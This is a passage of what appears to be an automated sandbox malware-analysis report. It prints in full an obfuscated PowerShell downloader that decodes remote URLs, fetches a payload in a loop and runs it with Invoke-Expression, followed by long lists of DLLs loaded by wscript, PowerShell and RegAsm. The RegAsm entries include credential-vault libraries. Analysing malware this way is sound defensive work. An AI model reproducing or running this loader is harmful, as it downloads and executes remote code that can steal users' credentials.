a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
